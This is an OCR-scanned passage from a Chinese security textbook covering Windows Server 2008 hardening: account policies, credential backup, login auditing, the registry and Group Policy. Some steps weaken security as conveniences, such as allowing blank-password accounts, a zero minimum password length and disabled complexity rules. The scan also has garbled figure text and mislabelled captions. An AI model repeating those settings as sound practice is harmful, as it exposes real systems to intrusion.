A. 对 称 加 密 B. 非 对 称 加 密 C. 古典 加 密 D. 现代 加 密 
3. 属于 非 对 称 加 密 的 是 ( )。 

A. DES B. RCS C. AES D. RSA 


4 如何 破解 包括 凯撒 密码 在 内 的 单字 母 蔡 换 密码 ? 


第 4 章 操作 系统 安全 技术 


亏本 章 课 前 准备 

学 习 本 章 内 容 之 前 ,需要 准备 如 下 知识 : 

。 了 解 操作 系统 的 基本 原理 ; 

。 掌握 Windows Server 2008 及 Linux 的 基本 操作 。 

x 本 章 教学 目标 

。 基本 掌握 高 级 安全 Windows 防火 墙 及 Redhat Linux 6.0 的 设置 方法 ; 

。 熟练 Windows Server 2008 及 Redhat Linux 6. 0 相关 安全 设置 ; 

。 使 用 Windows Server 2008 及 Redhat Linux 6.0 的 安全 功能 实现 有 关 功 能 。 
x 本 章 教学 要 点 

* 了解 Windows Server 2008 及 Redhat Linux 6. 0 的 基本 知识 ; 

* 熟悉 Windows Server 2008 及 Redhat Linux 6.0 的 安全 模块 和 常用 功能 ; 
。 学 会 Windows Server 2008 及 Redhat Linux 6.0 的 基本 设置 。 

e 本 章 教学 建议 

。 本 章 内 容 建议 采用 实践 案例 引导 模式 进行 教学 。 


4.1 操作 系统 安全 概述 


目前 计算 机 系统 安全 面临 的 威胁 主要 表现 为 三 类 : 信息 泄露 .拒绝 服务 和 信息 破坏 。 
其 中 信息 泄露 和 信息 破坏 也 可 能 造成 系统 拒绝 服务 。 

泄漏 信息 : 指 敏感 数据 在 有 意 或 无 意 中 被 泄漏 出 去 或 丢失 , 它 通常 包括 ,信息 在 传输 
中 丢失 或 泄漏 (如 利用 电磁 泄漏 或 搭 线 窍 听 等 方式 截获 机 密 信息 ,或 通过 对 信息 流向 、 流 
it .通信 频 度 和 长 度 等 参数 的 分 析 推 出 有 用 信息 ) ,信息 在 存储 介质 中 丢失 或 泄漏 以 及 通 
过 建立 隐蔽 隧道 窃取 敏感 信息 等 。 

破坏 信息 : 以 非法 手段 窃 得 对 数据 的 使 用 权 , 删 除 、 修 改 、 插 入 或 重 发 某 些 重要 信息 ， 
以 取得 有 益 于 攻击 者 的 响应 ;恶意 添加 、 修 改 数据 ,以 干扰 用 户 的 正常 使 用 。 

拒绝 服务 : 它 不 断 对 网 络 服务 系统 进行 干扰 ,改变 其 正常 的 作业 流程 ,执行 无 关 程序 
使 系统 响应 减 慢 甚至 瘫痪 ,影响 正常 用 户 的 使 用 ,甚至 使 合法 用 户 被 排斥 而 不 能 进入 计算 
机 网 络 系统 或 不 能 得 到 相应 的 服务 。 

因此 ,操作 系统 的 安全 是 整个 信息 安全 系统 安全 的 基础 和 核心 ,本 章 主要 介绍 
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Windows Server 2008 及 Redhat Linux 操作 系统 的 安全 措施 。 


4.2 Windows 系统 加 固 


4.2.1 实践 案例 4-1: Windows 账号 安全 管理 


1. Windows Server 2008 的 空白 账号 控制 

在 可 信任 的 内 工作 环境 中 ,网 络 管理 员 为 了 能 够 提高 控制 效率 ,总 喜欢 使 用 空白 密码 
的 账户 对 内 网 中 的 重要 计算 机 系统 进行 控制 和 管理 操作 。 可 是 , 当 他 们 尝试 使 用 空白 密 
码 的 账户 对 Windows Server 2008 系统 进行 控制 时 , 却 发 现 对 应 系统 禁止 使 用 空白 密码 ， 
或 者 即使 允许 使 用 空白 密码 ,但 是 使 用 这 样 的 空白 密码 账户 也 无 法 对 Windows Server 
2008 系统 进行 有 效 控制 ,那么 我 们 有 没有 办 法 使 用 空白 密码 的 账户 ,对 Windows Server 
2008 系统 进行 高 效 控制 呢 ? 其 实 很 简单 ,我 们 只 要 对 与 该 系统 相关 的 组 策略 参数 进行 合 
适 设置 ,就 能 实现 上 述 控制 目的 。 

首先 ,依次 单 击 Windows Server 2008 系统 桌面 上 的 “开始 ”一 运行 ”命令 ,在 弹出 的 
系统 运行 对 话 框 中 ,输入 字符 串 命令 "gpedit. msc”, 单 击 “ 确 定 ” 按 钮 后 ,打开 对 应 系统 的 
组 策略 控制 台 窗 口 ,如 图 4. 1 所 示 。 
ETT 操作 必 ) 查看 W) 帮助 00 
中 | 日 于 | 日 加 
n FETTE 


ri 
Bde 计算 机 配置 
D 软件 设置 
田园 Yindows 设置 
a 国 管理 模板 AUR 
Bw APRE 
田 国 软件 设置 
田 国 Yindows 设置 
田 国 管理 模板 


选择 一 个 项 目 来 查看 它 的 指 述 。 


JT D) 
扩展 
广 -一 基本 一 一 一 一 一 


图 4.1 组 策略 控制 台 窗 口 


其 次 ,在 该 控制 台 窗口 的 左 侧 位 置 处 ,用 鼠标 依次 双击 “计算 机 配置 ”Windows 设 
置 ”>“ 安 全 设置 ”一 “账户 策略 ”一 “密码 策略 ”选项 ,在 对 “应 密码 策略 ”选项 的 右 侧 显 示 区 
域 ,用 鼠标 双击 “密码 长 度 最 小 值 ? 组 策略 选项 ,从 其 后 出 现 的 组 策略 选项 设置 对 话 框 中 ， 
将 密码 长 度 设置 为 “0 个 字符 ”, 再 单 击 “确定 ?按钮 ,保存 好 上 述 设 置 操作 结束 ,如 图 4. 2 
所 示 。 

接着 ,再 依次 展开 “计算 机 配置 ”选择 项 下 面 的 “Windows 设置 "一 “安全 设置 "一 “本 
地 策略 ”>“ 安 全 选项 ”, 在 对 应 “安全 选项 ” 右 侧 的 列表 区 域 中 ,用 鼠标 双击 “目标 组 策略 ” 
选项 (账户 : 使 用 空白 密码 的 本 地 账户 只 允许 进行 控制 台 登 录 ) .打开 如 图 4.3 所 示 的 目 
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ES EL EE 


4.2 密码 策略 


标 组 策略 选项 设置 对 话 框 ,选中 其 中 的 “已 禁用 ”选项 ,再 单 击 “ 确 定 ” 按 钮 执行 设置 保存 操 
作 , 如 此 一 来 我 们 就 能 使 用 空白 密码 的 账户 对 Windows Server 2008 系统 进行 高 效 控制 
和 管理 操作 。 


ESSELTE] 


E E] Windors 


ci Resa 
田 
日 


4.3 目标 组 策略 选项 设置 


2. 智能 备份 本 地 所 有 账户 

如 果 Windows Server 2008 系统 同时 创建 了 若干 个 重要 的 用 户 账号 ,并 且 对 于 这 些 
用 户 账 号 的 信息 平时 不 加 以 备份 和 保存 的 话 .一旦 Windows Server 2008 系统 遇 到 意外 
不 能 正常 运行 时 ,这 些 用 户 账号 的 所 有 信息 也 会 在 瞬间 丢失 ,以 后 我 们 往往 很 难 通过 人 工 
记忆 的 方法 将 它们 正确 恢复 到 原始 状态 。 为 了 保护 本 地 所 有 用 户 账号 信息 的 安全 ,我 们 
可 以 直接 使 用 Windows Server 2008 系统 自 带 的 账号 备份 功能 ,来 定期 对 本 地 系统 中 的 
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所 有 用 户 账号 信息 执行 智能 备份 操作 ,下 面 就 是 具体 的 用 户 账号 备份 操作 步骤 。 

首先 ,以 系统 特权 账号 登录 进入 Windows Server 2008 系统 , 单 击 该 系统 桌面 上 的 
“开始 "菜单 ,从 中 选择 “运行 "选项 ,并 在 弹出 的 系统 运行 框 中 执行 “credwiz" 字 符 串 命令 ， 
单 击 “ 确 定 ” 按 钮 。 

其 次 ,选中 该 向 导 设置 窗口 中 的 “备份 存储 的 用 户 名 和 密码 ”选项 ,同时 单 击 “下 一 步 ” 
按钮 ,如 图 4.4 所 示 。 


trinm Pd 


4.4 备份 存储 的 用 户 名 和 密码 1 


打开 如 图 4.5 所 示 的 设置 对 话 框 , 单 击 这 里 的 “浏览 ”按钮 ,从 其 后 出 现 的 文件 夹 选 择 
对 话 框 中 ,设置 好 用 户 账号 备份 文件 的 保存 文件 夹 ,同时 设 园 好 备份 文件 的 名 称 , 最 后 单 
击 “ 保 存 ” 按 钮 ,如 此 一 来 Windows Server 2008 系统 就 能 智能 将 本 地 系统 的 所 有 账号 信 
息 存 储 到 一 个 . crd 格式 的 文件 中 。 


图 4.5 备份 存储 的 用 户 名 和 密码 2 


如 果 以 后 Windows Server 2008 系统 中 的 用 户 账号 信息 不 小 心 被 破坏 或 丢失 时 ,我 
们 可 以 再 次 打开 用 户 账号 备份 向 导 设 置 窗口 ,选中 “还 原 存 储 的 用 户 名 和 和 密码” 选项, 导 
A. crd 格式 的 备份 文件 ,这 样 Windows Server 2008 系统 的 用 户 账号 信息 就 能 很 快 恢复 
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正常 了 。 

3. 账户 安全 策略 

追踪 用 户 账户 登录 信息 : 与 传统 操作 系统 不 同 的 是 ,Windows Server 2008 系统 可 以 
对 前 一 次 登录 本 地 系统 的 用 户 账户 信息 进行 追踪 记录 ,利用 这 个 功能 ,我 们 可 以 监控 系统 
处 于 空闲 状态 时 ,是 否 有 恶意 用 户 偷 偷 登录 本 地 计算 机 的 情况 。 在 默认 状态 下 , Windows 
Server 2008 系统 并 不 能 对 用 户 账户 的 登录 状态 信息 进行 追踪 .记忆 ,我 们 需要 按照 下 面 
的 步骤 操作 将 该 功能 启用 起 来 。 

首先 ,依次 单 击 Windows Server 2008 系统 桌面 上 的 “开始 ”一 “运行 ”选项 ,打开 系统 
运行 对 话 框 ,将 gpedit. msc 字符 串 命 令 填写 在 其 中 ,同时 单 击 “ 确 定 ” 按 钮 ,进入 对 应 系统 
的 组 策略 控制 台 窗口 ,然后 将 鼠标 定位 于 该 组 策略 控制 台 窗口 左 侧 位 置 处 的 “计算 机 配 
置 ? 节 点 上 ,并 逐一 展开 目标 节点 下 面 的 “管理 模板 ”, 如 图 4.6 所 示 。 


贞 本 地 组 策略 编辑 品 
XAD 操作 FEV MW 


e€9»|imisiHtr 


ows 组 件 


选择 一 个 项 目 来 查看 它 的 措 述 。 
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其 次 , 单 击 选择 "Windows 组 件 ”, 在 其 子 文件 夹 中 单 击 选择 “Windows 登录 选项 ”, 出 
现 如 图 4.7 所 示 的 对 话 框 。 

再 双击 右面 的 “在 用 户 登 录 期 间 显 示 有 关 以 前 登录 的 信息 ”组 策略 选项 ,此 时 系统 屏 
幕 上 会 出 现 如 图 4. 8 所 示 的 目标 组 策略 属性 窗口 .将 其 中 的 “已 启动 ”项 目 选 中 ,同时 单 击 
“确定 ”按钮 保存 好 上 述 设置 操作 ,如 此 一 来 Windows Server 2008 系统 就 可 以 追踪 用 户 
账户 登录 信息 。 

以 后 ,我 们 每 次 成 功 重新 启动 Windows Server 2008 系统 后 ,系统 屏幕 会 自动 弹出 提 
AR ,告诉 我 们 上 一 次 登录 系统 的 用 户 账户 信息 ,根据 这 些 信 息 我 们 就 能 大 概 判断 出 究竟 是 
否 有 人 偷偷 登录 本 地 计算 机 系统 。 

4. 即时 监控 账号 创建 状态 


Internet 网 络 中 的 一 些 病毒 或 木马 .常常 会 暗地里 在 Windows Server 2008 系统 中 创 
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田 国 Internet Explorer 
国 Internet. 信息 服务 
E Netleetine 


E Password Synchronization 


国 Windows Defender 

国 Windows Mail 

国 Windows Media Player 

E Yindows Media 数字 权限 管理 
C] Yindows Messenger 

国 winaows Movie Maker 

国 Windows PowerShell 


图 4.8 登录 信息 


建 恶意 账户 ,日 后 通过 恶意 账户 就 能 对 本 地 计算 机 系统 实施 非法 攻击 了 ,那么 我 们 能 否 在 
第 一 时 间 知 道 Windows Server 2008 系统 中 有 新 的 用 户 账号 被 偷偷 创建 了 呢 ? 其 实 很 简 
单 ,我 们 可 以 利用 Windows Server 2008 系统 新 增加 的 附加 任务 计划 功能 ,对 用 户 账号 的 
创建 事件 进行 即时 监控 报警 ,下 面 就 是 具体 的 监控 报警 步骤 。 

首先 , 单 击 Windows Server 2008 系统 的 “开始 ”菜单 ,从 中 选择 “运行 ”命令 ,打开 本 
地 系统 的 运行 对 话 框 ,在 其 中 执行 secpol. msc 字符 串 命 令 , 进 入 对 应 系统 的 本 地 安全 策 
略 控制 台 窗 口 ,如 图 4.9 所 示 。 

其 次 ,从 该 安全 策略 控制 台 窗 口 的 左 侧 位 置 处 ,依次 展开 “本 地 策略 >“ 审核 策略 ”分 
支 选项 ,在 对 应 “审核 策略 ”分 支 选 项 的 右 侧 显示 位 置 处 ,用 鼠标 双击 “审核 账户 管理 ”组 策 
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图 4.9 本 地 安全 策略 控制 台 


略 选项 ,打开 如 图 4. 10 所 示 的 选项 设置 对 话 框 ,选中 该 对 话 框 中 的 成功” 选项 ,再 单 击 
“确定 ”按钮 执行 设置 保存 操作 。 


审核 帐户 管理 属性 


图 4.10 审核 账户 管理 


接着 逐一 选择 “开始 ”一 程序 ”服务 器 管理 器 ?选项 ,从 服务 器 管理 器 窗口 左 侧 位 
置 处 选中 “配置 ?选项 ,再 依次 展开 该 节点 下 面 的 “本 地 用 户 和 组 ”用 户 ? 子 项 ,同时 用 鼠 
标 右 击 “ 用 户 ” 选 项 ,执行 右键 菜单 中 的 “新 建 用 户 ” 命 令 来 任意 创建 一 个 新 用 户 账号 ,如 
4.11 所 示 。 

下 面 打 开 Windows Server 2008 系统 的 “控制 面板 ”窗口 ,双击 “管理 工具 ”图 标 ,再 双 
击 “ 事 件 查 看 器 ”选项 , 单 击 “Windows 日 志 ”, 单 击 打 开 其 中 的 “安全 ”选项 ,从 “安全 ”选项 
右 侧 位 置 处 我 们 会 看 到 先前 创建 新 用 户 账号 的 事件 已 经 产生 ,如 图 4. 12 所 示 。 

用 鼠标 右 击 目标 事件 选项 ,并 选择 快捷 菜单 中 的 “将 任务 附加 到 此 事件 ?命令 ,在 弹出 
的 附加 任务 向 导 对 话 框 中 ,依照 向 导 提 示 创 建 一 个 自动 报警 提示 的 任务 计划 ,例如 我 们 可 
以 选用 "显示 消息 ?报警 方式 ,并 将 报警 内 容 设置 为 "有 人 偷偷 在 本 地 非法 创建 账户 ”, 这 么 
一 来 要 是 有 木马 程序 或 非法 攻击 者 偷偷 在 Windows Server 2008 系统 中 创建 用 户 账 号 
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图 4.12 事件 查看 器 


时 ,我 们 就 能 即时 在 系统 屏幕 上 看 到 “有 人 偷偷 在 本 地 非法 创建 账户 "这样 的 报警 提示 , 那 
样 的 话 我 们 就 能 在 第 一 时 间 知 道 用 户 账号 的 创建 状态 。 


4.2.2 实践 案例 4-2: 注册 表 管理 


注册 表 (Registry ,繁体 中 文 版 Windows 称 之 为 登录 ) 是 Microsoft Windows 中 的 一 
个 重要 的 数据 库 , 用 于 存储 系统 和 应 用 程序 的 设置 信息 。Windows 注册 表 是 帮助 
Windows 操作 系统 控制 软件 、 硬 件 . 用 户 环境 和 界面 的 数据 信息 ,是 Windows 中 的 一 个 
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重要 的 数据 库 , 如 图 4. 13 所 示 。 


图 4.13 注册 表 


注册 表 是 Windows NT 中 所 有 32 位 硬件 驱动 和 32 位 应 用 程序 设计 的 数据 文件 。 
16 位 驱动 在 Winnt 下 无 法 工作 ,所 以 所 有 设备 都 通过 注册 表 来 控制 ,一 般 这 些 是 通过 
BIOS 来 控制 的 。 在 Windows 95 下 ,16 位 驱动 会 继续 以 实 模式 方式 来 工作 ,它们 使 用 
system. ini 来 进行 控制 。16 位 应 用 程序 会 工作 在 NT 或 者 Windows 95 下 ,它们 的 程序 
仍然 会 利用 win. ini 和 system. ini 文件 获得 信息 和 控制 。 在 没有 注册 表 的 情况 下 ,操作 
系统 不 会 获得 运行 和 控制 附属 设备 ,应 用 程序 和 正确 响应 用 户 输入 的 必要 信息 。 

当 一 个 用 户 准 备 运行 一 个 应 用 程序 时 ,注册 表 提 供应 用 程序 信息 给 操作 系统 ,这 样 应 
用 程序 就 可 以 被 操作 系统 找到 ,正确 的 数据 文件 位 置 也 被 规定 了 ,其 他 设置 也 都 可 以 使 用 
了 。 注 册 表 控制 所 有 32 位 应 用 程序 和 驱动 ,控制 的 方法 是 基于 用 户 和 计算 机 的 ,而 不 依 
赖 于 应 用 程序 或 驱动 ,每 个 注册 表 的 参数 项 控制 一 个 用 户 功 能 或 者 计算 机 功能 。 用 户 功 
能 可 能 包括 了 桌面 外 观 和 用 户 目录 。 计 算 机 功能 和 安装 的 硬件 和 软件 有 关 , 对 所 有 用 户 
来 说 都 是 公用 的 。 

有 些 程序 功能 对 用 户 有 影响 ,有 些 是 作用 于 计算 机 而 不 是 为 个 人 设置 的 ,同样 地 , 驱 
动 可 能 是 用 户 指定 的 ,但 在 很 多 时 候 , 它 们 在 计算 机 中 是 通用 的 。 

1. 注册 表 的 基本 信息 

D HKEY CLASSER ROOT 

该 键 之 下 至 少 包 括 100 个 关键 字 , 这 个 分 支 下 主要 包括 OLE 数据 ,还 包括 文件 扩展 
名 文件 和 应 用 程序 的 关联 数据 ,改变 分 支 中 的 数据 结构 和 内 容 将 直接 影响 到 系统 软件 的 
应 用 ,这 个 分 支 下 的 信息 都 被 保存 在 system. dat 文件 中 。 

2) HKEY USER 

在 这 个 关键 字 下 显示 的 信息 都 被 保存 在 User. dat 文件 中 ,这 包含 了 与 具体 用 户 有 关 
的 Desktop( 桌 面 ) 配 置 、 网 络 连接 和 Start( 开 始 ) 菜 单 。 如 果 用 户 的 计算 机 被 配置 为 使 用 
户 的 配置 文件 ,那么 系统 就 会 为 每 个 用 户 创建 一 个 单独 的 User. dat 文件 。 当 一 个 用 户 
登录 到 计算 机 上 时 , Windows 将 读 取 那个 用 户 的 user. dat 文件 ,并 把 该 文件 放 入 内 存 中 
的 Registry 中 。 
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3) HKEY_CURRENT_USER 

它 是 适用 于 当前 用 户 的 HKEY USER 部 分 。 如 果 只 有 一 个 用 户 , 即 缺 省 用 户 , 那 么 
HKEY USERY. Default 和 HKEY_CURRENT_USER 是 相同 信息 的 不 同 显示 方式 。 

4) HKEY LOCAL MACHINE 

这 是 针对 计算 机 硬件 以 及 安装 的 软件 所 设 定 的 分 支 。 如 果 计 算 机 有 多 个 硬件 配置 ， 
那么 每 个 配置 的 信息 都 保存 在 这 里 。 如 果 查 看 一 下 该 分 支 下 的 SOFTWARE 信息 ,会 发 
现 生产 已 安装 软件 的 公司 的 名 字 都 在 这 儿 , 这 个 分 支 为 关于 每 个 公司 产品 的 信息 存放 和 
具体 机 器 有 关 的 信息 存放 提供 一 个 方便 的 地 方 。 在 这 儿 , 你 还 可 以 发 现 应 用 程序 的 名 字 、 
版 本 数 .应 用 程序 路 径 名 以 及 硬件 设置 。Microsoft 也 使 用 这 个 分 支 注册 它 的 软件 。 

5) HKEY_CURRENT_CONFIGURATION 

在 这 里 用 户 可 以 找到 显示 设置 情况 和 使 用 的 打印 机 。 

2. 注册 表 的 备份 与 恢复 

1) 注册 表 的 备份 

单 击 系统 桌 面 上 的 “开始 ”菜单 ,从 中 选择 “运行 ”选项 ,运行 regedit, 打 开 * 注 册 表 编辑 
项 ”窗口 。 单 击 打 开 “ 注 册 表 ”, 选 择 * 导 出 注册 表 文件 "菜单 命令 ,弹出 “导出 注册 表 文件 ”对 
话 框 ,如 图 4. 14 所 示 。 选 择 注册 表 备份 文件 的 保存 路 径 、 名 称 以 及 保存 全 部 或 只 保存 注册 
表 的 某 个 分 支 。 根 据 自己 的 需要 设 定好 后 , 单 击 “ 保 存 " 按 钮 , 即 可 完成 注册 表 的 备份 。 


[aw — — sigle me 


4.14. 注册 表 的 备份 


2) 注册 表 的 恢复 

按 上 述 步 骤 打 开 * 注 册 表 编辑 器 ?后 ,依次 双击 运行 “注册 表 ”-~“ 引 入 注册 表 文 件 ? 弹 
出 “引入 注册 表 文件 ”对 话 框 ,如 图 4. 15 所 示 。 

找到 曾经 导出 的 注册 表 备份 文件 , 单 击 " 打 开 ” 按 钮 即 可 完成 注册 表 的 恢复 ,恢复 完成 
后 出 现 一 个 提示 框 , 单 击 “ 确 定 ” 按 钮 并 重新 启动 计算 机 即 可 。 

3. 注册 表 的 应 用 

D 登录 计算 机 时 无 须 按 Ctrl 十 Alt 十 Del 

Jb F "38 11" BE A. gpedit. msc 进入 组 策略 编辑 器 。 依 次 双击 “计算 机 配置 ” 
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图 4.15 注册 表 的 恢复 


—"Windows 配置 ”>“ 安 全 设置 ">“ 本 地 策略 ”>“ 安 全 选项 ”一 “交互 式 登录 ”>“ 无 须 按 
Ctrl 十 Alt 十 Del”, 勾 选 “ 已 启用 ”, 如 图 4. 16 所 示 。 


IU. 允许 系统 在 未 登录 的 情况 下 关闭 已 禁用 | 
允许 软盘 夏 制 并 访问 所 有 驱动 .。 已 禁用 | 
允许 自动 管理 登录 
不 显示 最 后 的 用 户 名 
VOESERRSRI P0 ABUS 


试图 登录 的 用 户 的 消息 文本 
提示 用 户 在 过 期 之 前 更 改 密 码 


设备 
设备 : 将 CD-ROM 的 访问 权限 仅 限于 本 地 登 
将 软盘 驱动 器 的 访问 权限 仅 限于 本 地 


图 4.16 让 计算 机 直接 登录 而 无 须 按 Ctrl 十 Alt 十 Del 


2) 进入 系统 无 须 用 户 密码 

让 Windows Server 2008 启动 后 直接 进入 系统 而 无 须 输入 用 户 密码 。 关 闭 Windows 
Server 2008 的 复杂 性 密码 要 求 : 运行 “开始 ”一 “运行 ,键入 gpedit. msc 进入 组 策略 编辑 
器 。 依 次 双击 “计算 机 配置 ”一 “Windows 配置 > 安全 设置 ?一 “账户 策略 ”一 “密码 策 
略 ”- 盖 密码 必须 符合 复杂 性 要 求 ”, 设 为 "已 禁用 ”如 图 4.17。 

3) 安装 桌面 体验 

由 于 Windows Server 2008 是 服务 器 系统 ,默认 是 没有 华丽 效果 的 。 开 启 效果 的 方 
法 如 下 : 依次 双击 “服务 器 管理 ”>“ 功 能 ”~“ 添 加 功能 ”>“ 桌 面体 验 ”, 如 果 有 无 线 设备 ， 
如 笔记 本 的 无 线 网 卡 等 、 无 线 功能 也 要 选 上 。 设 置 完 后 重启 计算 机 ,系统 将 继续 自动 配置 
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至 完成 ,如 图 4. 18 所 示 。 


图 4.18 安装 桌面 体验 


4. 注册 表 的 权限 

Windows Server 2008 中 的 系统 注册 表 权 限 。 如 果 打 开 Windows 资源 管理 器 ,选择 
“安全 ”(Security) 选 项 卡 , 右 击 “本 地 磁盘 ”Local Disk (C: ) ,并 选择 “属性 ”(Properties ) , 
会 看 到 管理 员 具 备 完全 控制 权限 。 如 果 单 击 “ 组 或 用 户 名 ”(Group or user names) 下 的 
SYSTEM ,将 会 看 见 SYSTEM 同样 具有 完全 控制 权限 。 当 单 击 “ 组 或 用 户 名 ”(Group or 
user names) 下 的 “用 户 ”(Users) 时 ,权限 情况 则 比较 复杂 ,图 4. 19 中 系统 里 的 用 户 组 具 
备 Read & Execute, List 和 Read 等 权限 。 单 击 “ 高 级 ”(Advanced) 按 钮 将 显示 出 与 该 用 
户 组 相关 联 权限 的 详细 信息 ,如 图 4. 20 所 示 。 

用 户 组 的 成 员 可 以 在 系统 驱动 器 根 目录 下 创建 文件 夹 并 向 文件 添加 数据 。 如 果 单 击 
“编辑 ”按钮 ,将 看 到 另 一 项 对 子 文件 夹 的 “特殊 ”授权 ,此 操作 需要 管理 员 权 限 ,如 图 4. 21 
所 示 。 

可 以 看 到 在 Windows Server 2008 中 ,普通 用 户 默 认可 以 在 系统 驱动 器 的 根 目录 中 
创建 子 文件 夹 , 并 向 这 些 文件 夹 添 加 内 容 。 为 Windows Server 2008 中 用 户 组 的 成 员 提 
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ntry for Local Disk (C) 


lÄÖooo0og0o0000 
| 上 口 口 口 口 口 口 口 口 口 口 口 


图 4.20 注册 表 的 权限 2 4.21 注册 表 的 权限 3 


供 该 功能 的 原因 是 某 些 第 三 方 软件 假定 存在 这 些 权 限 ,但 Microsoft 不 想 破坏 应 用 程序 
的 兼容 性 。 

5. 注册 表 的 优化 

优化 配置 Windows Server 2008, 使 它 更 适合 用 户 。 

1) 提高 Windows Server 2008 系统 关机 速度 

依次 单 击 Windows Server 2008 系统 桌面 上 的 “开始 ”一 “运行 ?选项 ,打开 系统 运行 
对 话 框 ,将 regedit 字符 串 命 令 填 写 在 其 中 ,同时 单 击 “ 确 定 ” 按 钮 ,打开 “注册 表 编 辑 器 " 窗 
口 , 如 图 4. 22 所 示 。 

定位 注册 表 到 HKEY _LOCAL_MACHINE\\SYSTEM\\CurrentControlSet VV 
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Control, 设 置 键 值 WaitToKillServiceTimeout 为 1, 如 图 4. 23 所 示 。 


MNETIIIITI 


| Ej Control Panel 
Bio Accessibility 


— LengusgeCon£i gurati on. 
p Yindoslletrics 
dà VaitToillAppineout 


图 4.22 提高 开机 速度 1 


4.23 提高 开机 速度 2 


2) 自动 释放 DLL 占用 的 内 存 

运行 regedit. 打开 “注册 表 编 辑 器 窗口。 定位 注册 表 到 HKEY _ LOCAL _ 
MACHINEW SOFTWAREN\Microsoft\\Windows\\CurrentVersion\\Explorer, 设 置 
键 值 AlwaysUnload DLL 为 1, 如 图 4. 24 所 示 。 


4.2.3 实践 案例 4-3: Windows 组 策略 


尽管 Windows Server 2008 系统 的 安全 性 要 领先 其 他 操作 系统 一 大 步 , 不 过 默认 状 
态 下 过 高 的 安全 级 别 常常 使 不 少 人 无 法 在 Windows Server 2008 系统 环境 下 顺利 地 进行 
各 种 操作 ,为 此 许多 用 户 往往 会 采用 手工 方法 来 降低 Windows Server 2008 系统 的 安全 
访问 级 别 。 可 是 ,一 旦 降低 安全 访问 级 别 ,Windows Server 2008 系统 遭遇 安全 攻击 的 可 
能 性 就 会 变 得 非常 大 。 那 么 如 何在 安全 访问 级 别 不 高 的 情况 下 ,我 们 仍然 能 够 让 
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zo 注册 表 编辑 器 


User Shell Fi 

a qe H 
Bi VisulEffect: 
Ei VoluneCaches 
Ji YindowsUpdat. 


L pdi Mivayslisd oadi 
ate Fa 


图 4.24 自动 释放 DLL 占用 的 内 存 


Windows Server 2008 系统 安全 地 运行 ?要 做 到 这 一 点 ,可 以 利用 Windows Server 2008 
系统 强大 的 组 策略 功能 ,来 对 相关 选项 参数 进行 有 效 设置 。 

1. 禁止 恶意 程序 “不 请 自 来 ” 

在 Windows Server 2008 系统 环境 中 使 用 下 浏览 器 上 网 浏览 网 页 内 容 时 ,时 常会 有 
一 些 恶 意 程序 “不 请 自 来 ”, 偷 偷 下 载 保存 到 本 地 计算 机 硬盘 中 ,这 样 不 但 会 白白 浪费 宝贵 
的 硬盘 空间 资源 ,而 且 也 会 给 本 地 计算 机 系统 的 安全 带 来 不 少 麻烦 。 为 了 让 Windows 
Server 2008 系统 更 加 安全 ,往往 需要 借助 专业 的 软件 工具 才能 禁止 应 用 程序 随意 下 载 ， 
然而 这 样 的 操作 不 仅 麻烦 而 且 比 较 累 人 。 其 实 , 在 Windows Server 2008 系统 环境 中 ,只 


要 简单 地 设置 一 下 系统 组 策略 参数 ,就 能 禁止 恶意 程序 自动 下 载 保存 到 本 地 计算 机 硬盘 
中 ,下 面 就 是 具体 的 设置 步骤 。 


首先 以 特权 账号 进入 Windows Server 2008 系统 环境 ,依次 单 击 系统 桌面 中 的 “ 开 
始 ” 一 运行 ?选项 ,在 系统 运行 框 中 执行 gpedit. msc 命令 ,打开 本 地 计算 机 的 组 策略 编辑 
窗口 ,如 图 4. 25 所 示 。 
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图 4.25 组 策略 编辑 
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其 次 在 组 策略 编辑 窗口 左 侧 区 域 展开 * 计 算 机 配置 分支, 再 依次 选择 该 分 支 下 面 的 
“管理 模板 ”~“Windows £B f/F"— Internet Explorer 一 “安全 功能 ”一 “限制 文件 下 载 " 子 
项 ,双击 “限制 文件 下 载 ” 子 项 下 面 的 "Internet Explorer 进程 ?组 策略 选项 ,打开 如 图 4. 26 
所 示 的 目标 组 策略 属性 设置 窗口 。 


Internet Explorer 进程 展 性 


4.26 目标 组 策略 属性 设置 


选中 ”已 启用 ?选项 ,再 单 击 * 确 定 ? 按 钮 退出 组 策略 属性 设置 窗口 ,这 样 一 来 就 能 成 功 
启用 限制 Internet Explorer 进程 下 载 文件 的 策略 设置 ,日 后 Windows Server 2008 系统 
就 会 自动 弹出 阻止 Internet Explorer 进程 的 非 用 户 初始 化 的 文件 下 载 提 示 , 单 击 提示 对 
话 框 中 的 “确定 ”按钮 ,恶意 程序 就 不 会 通过 IE 浏览 器 窗口 随意 下 载 并 保存 到 本 地 计算 机 
硬盘 中 了 。 

2. 对 重要 文件 夹 进行 安全 审核 


Windows Server 2008 系统 可 以 使 用 安全 审核 的 方法 来 跟踪 访问 重要 文件 夹 或 其 他 
对 象 的 登录 尝试 .用 户 账号 、 系 统 关闭 、 重 启 系统 以 及 其 他 一 些 事 件 。 要 是 我 们 能 够 充分 
利用 Windows Server 2008 系统 文件 夹 的 审核 功能 ,就 能 有 效 保证 重要 文件 夹 的 访问 安 
全 性 ,其 他 非法 攻击 者 就 无 法 轻易 对 其 进行 恶意 破坏 。 在 对 Windows Server 2008 系统 
中 的 重要 文件 夹 进行 访问 审核 时 ,可 以 按照 如 下 步骤 来 进行 。 

首先 以 特权 账号 进入 Windows Server 2008 系统 环境 ,依次 单 击 系统 桌面 中 的 “ 开 
始 ”“ 运 行 ”选项 ,在 系统 运行 框 中 执行 gpedit. msc 命令 ,打开 本 地 计算 机 的 组 策略 编辑 
窗口 。 

其 次 在 组 策略 编辑 窗口 左 侧 区 域 展 开 “ 计 算 机 配置 "分支 。 再 依次 选择 该 分 支 下 面 的 
"Windows 设置 ”安全 设置 ”本 地 策略 ”审核 策略 ?选项 ,在 对 应 “审核 策略 ?选项 
的 右 侧 显 示 区 域 中 找到 “审核 对 象 访问 "目标 组 策略 项 目 .并 用 鼠标 右 击 该 项 目 ,执行 右键 
菜单 中 的 “属性 ”命令 ,打开 目标 组 策略 项 目的 属性 设置 窗口 .如 图 4. 27 所 示 。 
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图 4.27 审核 访问 对 象 


选中 该 属性 设置 窗口 中 的 “成 功 ”" 和 “失败 " 复 选项 ,再 单 击 “ 确 定 ” 按 钮 ,如 此 一 来 访 
问 重要 文件 夹 或 其 他 对 象 的 登录 尝试 .用户 账号 .系统 关闭 .重启 系统 以 及 其 他 一 些 事件 
无 论 成 功 与 失败 ,都 会 被 Windows Server 2008 系统 自动 记录 并 保存 到 对 应 的 日 志文 件 
